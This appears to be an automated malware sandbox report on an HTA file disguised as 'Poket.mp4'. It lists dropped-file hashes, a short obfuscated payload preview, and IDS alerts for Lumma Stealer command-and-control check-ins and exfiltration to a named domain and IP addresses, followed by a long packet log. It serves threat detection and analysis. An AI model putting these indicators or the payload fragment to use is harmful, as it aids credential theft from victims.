                                                                                            • 185.161.251.21
                                                                                            Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            • 185.161.251.21
                                                                                            Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            • 185.161.251.21
                                                                                            GTA-5-Mod-Menu-2025.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            • 185.161.251.21
                                                                                            AquaDiscord-2.0.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            • 185.161.251.21
                                                                                            hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                            • 188.114.97.3
                                                                                            • 185.161.251.21
                                                                                            No context
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):8979
                                                                                            Entropy (8bit):4.866537018464794
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Zxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smtjBrdcU6CDR:H1VoGIpN6KQkj2qkjh4iUxCdMUib4
                                                                                            MD5:C5F74029744D2B4244E38C45B36E9035
                                                                                            SHA1:804BE0E38E7D982BD937AE2B4F71EC0B23BF959A
                                                                                            SHA-256:6B3BDDE6B61F7FB780B78D20B1C205C6B15C0E515DBBD9A4EDD5C9A79F2AD258
                                                                                            SHA-512:8209B2FF16422EDB16E995D0CF2E07947FBBDD26F13BF654D655C9E4858F266B8D7CE766D47B5955AEEECC0883AD7FDADAB6C3493B54F9EFF008EE541D0F543D
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1328
                                                                                            Entropy (8bit):5.426334484450913
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:3KIWSKco4KmM6GjKbmOIKo+mN1s4RPQoU99t7J0gt/NK3R8UHrg8g:xWSU4Yymp+ms4RIoU99tK8NWR8WNg
                                                                                            MD5:C981785E8710D665FA0CFDFC4B860873
                                                                                            SHA1:B5EAE3E4C48CED55F767BF8C33C9A18E204A3981
                                                                                            SHA-256:87479619237BF4A7273E9169303EA4E626207DB76A5EF49346F42EE00F13CA33
                                                                                            SHA-512:F0A80309F1735A4E4171E28F1530CB344EC875CDD2FBCC12B4366C7FCF76A98767FC1809B3EBE5A62710208C262EF68241B355BE8E3752231CF15E6AD45B1E24
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            File type:data
                                                                                            Entropy (8bit):5.577136957505929
                                                                                            TrID:
                                                                                              File name:Poket.mp4.hta
                                                                                              File size:1'645'681 bytes
                                                                                              MD5:9fb3db7b334f385701b3c88d63b7e5ee
                                                                                              SHA1:d901cd79292cf0f31db2f1c83a62460e1f6a1ef5
                                                                                              SHA256:658d84007977b9bcbac196d09ec012e15dba6d71f026613bb08e3a0ec4aceef8
                                                                                              SHA512:25a2cf3ed7f5b11ceb936c3ebd0696c5d4a63837dc2b1d90d9fa772f852d673c98d5ba8083b63f1bd9212db4f8059167248b7242cbd7c785e3941b8e08ab780c
                                                                                              SSDEEP:6144:7l5Aka0fKZdWkSflCSzBeJ2IbRGeYeyWfpYBe04PebeYj4BqrrvDqHHU11kYYTGm:4j
                                                                                              TLSH:0675E8742B2113D4AF75DD9ACE45E7E8EC28B50852210A5C638E1536E2078FC2BE7DBD
                                                                                              File Content Preview:66K75S6ei63K74s69p6fE6eC20L41W7aZ43l57c6dJ28M69A6ch63Y4dO49J63q29q7bc76w61f72s20i63g4aX76s78a50A3dk20W27y27c3bO66E6fW72v20W28K76d61z72I20A4fA6bD62w4ec70a56E20H3ds20Q30U3bp4fm6be62z4eH70Y56e20T3cv20Y69B6cF63K4dj49l63d2eB6cT65n6eg67M74d68n3bf20r4ff6bk62u4eS
                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-12-31T08:58:24.585041+01002058660ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (imbibelubmbe .click)1192.168.2.4532991.1.1.153UDP
                                                                                              2024-12-31T08:58:25.090129+01002058661ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)1192.168.2.449889188.114.97.3443TCP
                                                                                              2024-12-31T08:58:25.090129+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449889188.114.97.3443TCP
                                                                                              2024-12-31T08:58:25.555547+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449889188.114.97.3443TCP
                                                                                              2024-12-31T08:58:25.555547+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449889188.114.97.3443TCP
                                                                                              2024-12-31T08:58:26.062022+01002058661ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)1192.168.2.449897188.114.97.3443TCP
                                                                                              2024-12-31T08:58:26.062022+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449897188.114.97.3443TCP
                                                                                              2024-12-31T08:58:26.390403+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449897188.114.97.3443TCP
                                                                                              2024-12-31T08:58:26.390403+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449897188.114.97.3443TCP
                                                                                              2024-12-31T08:58:27.075762+01002058661ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)1192.168.2.449904188.114.97.3443TCP
                                                                                              2024-12-31T08:58:27.075762+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449904188.114.97.3443TCP
                                                                                              2024-12-31T08:58:28.329424+01002058661ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)1192.168.2.449913188.114.97.3443TCP
                                                                                              2024-12-31T08:58:28.329424+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449913188.114.97.3443TCP
                                                                                              2024-12-31T08:58:29.569974+01002058661ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)1192.168.2.449919188.114.97.3443TCP
                                                                                              2024-12-31T08:58:29.569974+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449919188.114.97.3443TCP
                                                                                              2024-12-31T08:58:30.989336+01002058661ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)1192.168.2.449928188.114.97.3443TCP
                                                                                              2024-12-31T08:58:30.989336+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449928188.114.97.3443TCP
                                                                                              2024-12-31T08:58:31.963297+01002058661ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)1192.168.2.449936188.114.97.3443TCP
                                                                                              2024-12-31T08:58:31.963297+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449936188.114.97.3443TCP
                                                                                              2024-12-31T08:58:32.485383+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449936188.114.97.3443TCP
                                                                                              2024-12-31T08:58:33.050798+01002058661ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)1192.168.2.449945188.114.97.3443TCP
                                                                                              2024-12-31T08:58:33.050798+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449945188.114.97.3443TCP
                                                                                              2024-12-31T08:58:33.660394+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449945188.114.97.3443TCP
                                                                                              2024-12-31T08:58:34.513994+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449951185.161.251.21443TCP
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 31, 2024 08:57:11.845020056 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:11.845052958 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:11.845125914 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:11.874833107 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:11.874860048 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.341500998 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.341644049 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.344681978 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.344691038 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.344888926 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.356400967 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.399329901 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.722009897 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.722069979 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.722121000 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.722160101 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.722162962 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.722179890 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.722196102 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.722219944 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.722301006 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.722306967 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.722592115 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.722623110 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.722637892 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.722656012 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.722708941 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.722712994 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.828800917 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.828854084 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.828866005 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.828967094 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.829066038 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.829082012 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.834512949 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.834561110 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.834567070 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.841545105 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.841617107 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.841623068 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.848778009 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.848886967 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.848892927 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.856555939 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.856597900 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.856604099 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.863209009 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.863265991 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.863276005 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.870656967 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.870711088 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.870719910 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.877933979 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.877981901 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.877988100 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.887005091 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.887109995 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.887115955 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.927896976 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.927951097 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.927963018 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.941241980 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.941283941 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.941293001 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.941307068 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.941342115 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.941427946 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.947519064 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.947551012 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.947629929 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.947637081 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.947722912 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.953785896 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.963690042 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.963737965 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.963743925 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.963800907 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.966229916 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.966311932 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.972934961 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.972994089 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.978759050 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.978818893 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.985049963 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.985114098 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.991516113 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.991585970 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:12.997623920 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:12.997683048 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.003736019 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.003797054 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.021580935 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.021661997 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.022061110 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.022113085 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.027040958 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.027087927 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.032527924 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.032609940 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.038769960 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.038836002 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.044981956 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.045032024 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.052290916 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.052403927 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.052408934 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.052495956 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.054524899 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.054657936 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.067138910 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.067190886 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.067215919 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.067223072 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.067236900 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.067333937 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.068723917 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.068804979 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.073561907 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.073729038 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.081598043 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.081679106 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.095767975 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.095930099 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.106708050 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.106889963 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.111219883 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.111423016 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.118252039 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.119002104 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.123804092 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.123959064 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.128757954 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.128905058 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.128935099 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.128942966 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.129091978 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.129694939 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.130464077 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.131069899 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.131215096 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.135626078 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.135761976 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.135801077 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.136055946 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.138098001 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.138187885 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.141577959 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.141685963 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.145204067 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.145335913 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.147568941 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.147660017 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.151014090 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.151181936 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.154535055 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.154735088 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.156618118 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.156760931 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.160301924 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.160393953 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.165108919 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.166105986 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.168505907 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.168612957 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.172780991 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.172853947 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.174114943 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.174233913 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.176510096 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.176580906 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.178884029 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.179241896 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.183655024 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.183751106 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.188318968 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.188502073 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.188771009 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.188776970 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.188864946 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.190577030 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:13.190654993 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:13.191952944 CET44349735188.114.97.3192.168.2.4
